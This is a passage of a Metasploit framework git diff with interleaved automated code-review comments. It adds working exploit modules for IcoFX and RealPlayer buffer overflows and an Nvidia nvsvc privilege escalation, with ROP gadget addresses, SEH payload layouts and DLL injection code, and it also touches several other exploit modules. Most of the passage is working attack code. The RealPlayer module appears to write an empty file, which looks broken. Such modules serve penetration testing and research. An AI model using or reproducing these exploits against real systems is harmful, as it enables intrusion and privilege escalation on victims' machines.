|index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index 8459e51f16..d88342567f 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote eos - texml = texml.gsub(/^\t\t/,'') + texml = texml.gsub(/^ {4}/,'') print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) 
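Review bot: `make_pdf` in adobe_toolbutton.rb calls `Zlib::Deflate.deflate`, but the only require in this new file is `require 'msf/core'`, so the module appears to rely on zlib having been loaded elsewhere; adding `require 'zlib'` below it makes the dependency explicit. The header comment's URL is missing its colon (`http//metasploit.com/download`), and the same line appears in the other new modules in this commit (icofx_bof.rb, realplayer_ver_attribute_bof.rb, nvidia_nvsvc.rb). The description names 10.0.4 as the tested 10.x build while the crash log in the trailing `=begin` block is labelled Adobe Reader 10.1.4. One of the two should be corrected so readers can tell which builds were actually verified.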
diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb new file mode 100644 index 0000000000..1def45cf42 --- /dev/null +++ b/modules/exploits/windows/fileformat/icofx_bof.rb 
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IcoFX Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in version 2.1 + of IcoFX. The vulnerability exists while parsing .ICO files, where an specially + crafted ICONDIR header, providing an arbitrary long number of images into the file, + can be used to trigger the overflow when reading the ICONDIRENTRY structures. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Marcos Accossatto', # Vulnerability discovery, poc + 'juan vazquez' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2013-4988' ], + [ 'OSVDB', '100826' ], + [ 'BID', '64221' ], + [ 'EDB', '30208'], + [ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ] + ], + 'Platform' => [ 'win' ], + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 864, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Targets' => + [ + [ 'IcoFX 2.5 / Windows 7 SP1', + { + :callback => :target_win7, + } + ], + ], + 'DisclosureDate' => 'Dec 10 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico']) + ], self.class) + + end + + def target_win7 + # All the gadgets com from IcoFX2.exe 2.5.0.0 + + # ICONDIR structure + ico = [0].pack("v") # Reserved. Must always be 0 + ico << [1].pack("v") # Image type: 1 for icon (.ico) image + # 0x66 is enough to overwrite the local variables and, finally + # the seh handler. 0x7f00 is used to trigger an exception after + # the overflow, while the overwritten SEH handler is in use. 
+ ico << [0x7f00].pack("v") + # ICONDIRENTRY structures 102 structures are using to overwrite + # every structure = 16 bytes + # 100 structures are used to reach the local variables + ico << rand_text(652) + ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods + ico << [0x0045cc21].pack("V") # jmp esp + ico << payload.encoded + ico << rand_text( + 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100 + 652 - # padding to align the stack pivot + 80 - # rop nops size + 4 - # jmp esp pointer size + payload.encoded.length + ) + # The next ICONDIRENTRY allows to overwrite the interesting local variables + # on the stack + ico << [2].pack("V") # Counter (remaining bytes) saved on the stack + ico << rand_text(8) # Padding + ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler + # The next ICONDIRENTRY allows to overwrite the seh handler + ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret + ico << rand_text(0xc) # padding + return ico + end + + def exploit + unless self.respond_to?(target[:callback]) + fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined") + end + + ico = self.send(target[:callback]) + + print_status("Creating '#{datastore['FILENAME']}' file...") + file_create(ico) + end + +end diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 085f137f33..b36117d8f4 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote BODY - body = body.gsub(/^\t\t/, '') + body = body.gsub(/^ {4}/, '') if request["Depth"].to_i > 0 if path.scan("/").length < 2 
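Review bot: The description in icofx_bof.rb says the overflow is in "version 2.1 of IcoFX", but the only target is `'IcoFX 2.5 / Windows 7 SP1'` and the comment in `target_win7` says the gadgets are from IcoFX2.exe 2.5.0.0. The affected version should be stated once and consistently, checked against the referenced advisory, because that text is what a reader uses to decide whether an installed copy is exposed. In the same comment, `com from` should read `come from`.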
@@ -233,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote SHARE - share = share.gsub(/^\t\t/, '') + share = share.gsub(/^ {4}/, '') return share end @@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote FILES end - files = files.gsub(/^\t\t\t/, '') + files = files.gsub(/^ {6}/, '') return files end @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') file_create(html) print_status("#{datastore['FILENAME']} must be run locally in order to execute our payload") diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index c84847b2f4..d467f0ba61 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote end - p = p.gsub(/^\t\t\t/, '') + p = p.gsub(/^ {6}/, '') return p end diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb new file mode 100644 index 0000000000..9ebc12853b --- /dev/null +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb 
@@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability in + version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by + improper bounds checking of the version and encoding attributes inside + the XML declaration. + + By persuading the victim to open a specially-crafted .RMP file, a + remote attacker could execute arbitrary code on the system or cause + the application to crash. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gabor Seljan' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6877' ], + [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'seh' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x22", + 'Space' => 532, + }, + 'Targets' => + [ + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51', + { + 'OffsetClick' => 2540, # Open via double click + 'OffsetMenu' => 13600, # Open via File -> Open + 'Ret' => 0x641930C8 # POP POP RET from rpap3260.dll + } + ], + [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32', + { + 'OffsetClick' => 2540, # Open via double click + 'OffsetMenu' => 13600, # Open via File -> Open + 'Ret' => 0x63A630B8 # POP POP RET from rpap3260.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 20 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']) + ], + self.class) + + end + + def exploit + + sploit = 
rand_text_alpha_upper(target['OffsetClick']) + sploit << generate_seh_payload(target.ret) + sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length) + sploit << generate_seh_payload(target.ret) + sploit << rand_text_alpha_upper(17000) # Generate exception + + # Create the file + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create("") + + end +end + diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 345994ab70..4e415858c6 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index bac8ced7a7..e9e4017905 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb 
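Review bot: `OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])` in realplayer_ver_attribute_bof.rb marks FILENAME as optional, whereas the other new file-format modules in this commit register it with `true`. `exploit` interpolates the value into its status message and then calls `file_create`, so an unset value would presumably only surface at write time; registering it as `[ true, 'The file name.', 'msf.rmp' ]` lets option validation reject it earlier. Separately, the `'ExitFunction' => 'seh'` key under `DefaultOptions` differs from the `'EXITFUNC'` key used by nvidia_nvsvc.rb in the same commit, so it is worth confirming which spelling the framework actually reads.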
@@ -19,10 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal', 'Description' => %q{ - This module exploits a directory traversal vulnerability on the version 11.52 of HP - LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically - in the copyFileToServer method, allowing to upload arbitrary files. This module has - been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2. + This module exploits a directory traversal vulnerability in version 11.52 of HP + LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically + in the copyFileToServer method, allowing the upload of arbitrary files. This module has + been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2. }, 'Author' => [ diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 40256e55fe..636f60f378 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -172,19 +172,6 @@ class Metasploit3 < Msf::Exploit::Local irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) 
@@ -261,31 +248,6 @@ class Metasploit3 < Msf::Exploit::Local return end - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] - ]) - print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0b9a32f593..cef0f217a2 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb 
@@ -18,17 +18,17 @@ class Metasploit3 < Msf::Exploit::Local 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 - SP2 systems, exploited on the wild on November 2013. The vulnerability exists while + SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used - to unsafely access an array, and the value is used to perform a call, leading to a NULL - pointer dereference, which is exploitable on both Windows XP and Windows 2003 systems. This + to access an array unsafely, and the value is used to perform a call, leading to a NULL + pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Unkwnon', # Vulnerability discovery + 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module 
@@ -87,44 +87,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', @@ -150,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local invalid_handle_value = 0xFFFFFFFF - r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0) + r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0) handle = r['return'] @@ -234,7 +196,14 @@ class Metasploit3 < Msf::Exploit::Local windir = expand_path("%windir%") cmd = "#{windir}\\System32\\notepad.exe" # run hidden - proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + begin + proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + # when running from the Adobe Reader sandbox: + # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. + return nil + end + return proc.pid end 
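Review bot: The rewritten `CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)` call in ms_ndproxy.rb replaces the named arguments (`"GENERIC_READ | GENERIC_WRITE"`, `"OPEN_EXISTING"`) with bare numbers. That changes the requested access and share mode to zero and leaves the reader to work out which position means what. If the change in access is intentional, a comment such as `# dwDesiredAccess = 0, dwShareMode = 0, dwCreationDisposition = OPEN_EXISTING (0x3)` would record it. The enclosing method starts and ends outside the hunk.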
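Review bot: The new `rescue Rex::Post::Meterpreter::RequestError` around `session.sys.process.execute` returns nil for every request error, not only the access-denied case its comment describes, and the exception itself is discarded. Binding and logging it, with `rescue Rex::Post::Meterpreter::RequestError => e` followed by `vprint_error("Process creation failed: #{e}")`, keeps the nil return while leaving a trace of what actually failed. The enclosing method (apparently `create_proc`, judging by the caller in a later hunk) starts outside this hunk, and the caller's nil check is added in that later hunk.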
@@ -424,9 +393,14 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, "The exploitation wasn't successful") end + p = payload.encoded print_good("Exploitation successful! Creating a new process and launching payload...") new_pid = create_proc - p = payload.encoded + + if new_pid.nil? + print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") + return + end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") if execute_shellcode(p, nil, new_pid) @@ -435,6 +409,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, "Error while executing the payload") end + end end diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 77f1fccadd..a219d3905b 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb 
@@ -67,44 +67,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index cd46a57950..ac5f8f5407 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb 
@@ -63,44 +63,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb new file mode 100644 index 0000000000..33223ce462 --- /dev/null +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb 
@@ -0,0 +1,168 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/process'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'msf/core/post/windows/services'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = AverageRanking
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Process
+ include Msf::Post::Windows::ReflectiveDLLInjection
+ include Msf::Post::Windows::Services
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
+ 'Description' => %q{
+ The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
+ interact with the service. It contains a stacked based buffer overflow as a result
+ of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
+ the service name is 'nvsvc', and the named pipe is 'nsvr'.
+
+ This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
+ It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Peter Wintersmith', # Original exploit
+ 'Ben Campbell ', # Metasploit integration
+ ],
+ 'Arch' => ARCH_X86_64,
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Targets' =>
+ [
+ [ 'Windows x64', { } ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2048,
+ 'DisableNops' => true,
+ 'BadChars' => "\x00"
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2013-0109' ],
+ [ 'OSVDB', '88745' ],
+ [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
+ ],
+ 'DisclosureDate' => 'Dec 25 2012',
+ 'DefaultTarget' => 0
+ }))
+
+ end
+
+ def check
+ vuln_hashes = [
+ '43f91595049de14c4b61d1e76436164f',
+ '3947ad5d03e6abcce037801162fdb90d',
+ '3341d2c91989bc87c3c0baa97c27253b'
+ ]
+
+ os = sysinfo["OS"]
+ if os =~ /windows/i
+ svc = service_info 'nvsvc'
+ if svc and svc['Name'] =~ /NVIDIA/i
+ vprint_good("Found service '#{svc['Name']}'")
+
+ begin
+ if is_running?
+ print_good("Service is running")
+ else
+ print_error("Service is not running!")
+ end
+ rescue RuntimeError => e
+ print_error("Unable to retrieve service status")
+ end
+
+ if sysinfo['Architecture'] =~ /WOW64/i
+ path = svc['Command'].gsub('"','').strip
+ path.gsub!("system32","sysnative")
+ else
+ path = svc['Command'].gsub('"','').strip
+ end
+
+ begin
+ hash = client.fs.file.md5(path).unpack('H*').first
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error("Error checking file hash: #{e}")
+ return Exploit::CheckCode::Detected
+ end
+
+ if vuln_hashes.include?(hash)
+ vprint_good("Hash '#{hash}' is listed as vulnerable")
+ return Exploit::CheckCode::Vulnerable
+ else
+ vprint_status("Hash '#{hash}' is not recorded as vulnerable")
+ return Exploit::CheckCode::Detected
+ end
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+ end
+
+ def is_running?
+ begin
+ status = service_status('nvsvc')
+ return (status and status[:state] == 4)
+ rescue RuntimeError => e
+ print_error("Unable to retrieve service status")
+ return false
+ end
+ end
+
+ def exploit
+ if is_system?
+ fail_with(Exploit::Failure::None, 'Session is already elevated')
+ end
+
+ unless check == Exploit::CheckCode::Vulnerable
+ fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+ end
+
+ print_status("Launching notepad to host the exploit...")
+
+ windir = expand_path("%windir%")
+ cmd = "#{windir}\\SysWOW64\\notepad.exe"
+ process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
+ host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{process.pid} launched.")
+
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+ library_path = ::File.join(Msf::Config.data_directory,
+ "exploits",
+ "CVE-2013-0109",
+ "nvidia_nvsvc.x86.dll")
+ library_path = ::File.expand_path(library_path)
+
+ print_status("Injecting exploit into #{process.pid} ...")
+ exploit_mem, offset = inject_dll_into_process(host_process, library_path)
+
+ print_status("Exploit injected. Injecting payload into #{process.pid}...")
+ payload_mem = inject_into_process(host_process, payload.encoded)
+
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ print_status("Payload injected. Executing exploit...")
+ host_process.thread.create(exploit_mem + offset, payload_mem)
+
+ print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
+ end
+end
+
diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
index 9fc4e1f9b0..d4d563a13a 100644
--- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
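Review bot: In nvidia_nvsvc.rb, `check` returns nil when `sysinfo["OS"]` does not match /windows/i, because the outer `if` has no `else` branch, so not every path yields a check code. A guard at the top, `return Exploit::CheckCode::Safe unless os =~ /windows/i`, fixes that and removes one level of nesting. The `rescue RuntimeError` around `is_running?` inside `check` looks unreachable, since `is_running?` already rescues RuntimeError and returns false. `path.gsub!("system32","sysnative")` is case-sensitive, so a service command recorded with `System32` would presumably be left unchanged on a WOW64 session and the hash lookup would then report Detected rather than the real state.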
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML_REDIR - ie_redir = ie_redir.gsub(/^\t\t\t/, '') + ie_redir = ie_redir.gsub(/^ {6}/, '') return ie_redir end diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 92e5925f49..63ca919ef1 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote BODY - body = body.gsub(/^\t\t/, '') + body = body.gsub(/^ {4}/, '') if request["Depth"].to_i > 0 if path.scan("/").length < 2 @@ -242,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote SHARE - share = share.gsub(/^\t\t/, '') + share = share.gsub(/^ {4}/, '') return share end @@ -284,7 +284,7 @@ class Metasploit3 < Msf::Exploit::Remote FILES end - files = files.gsub(/^\t\t\t/, '') + files = files.gsub(/^ {6}/, '') return files end @@ -311,7 +311,7 @@ class Metasploit3 < Msf::Exploit::Remote os.execute(#{var_temp_name}) LUA - lua_script = lua_script.gsub(/^\t\t/, '') + lua_script = lua_script.gsub(/^ {4}/, '') return lua_script end diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 5129f8f8d3..121bb1b81a 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, 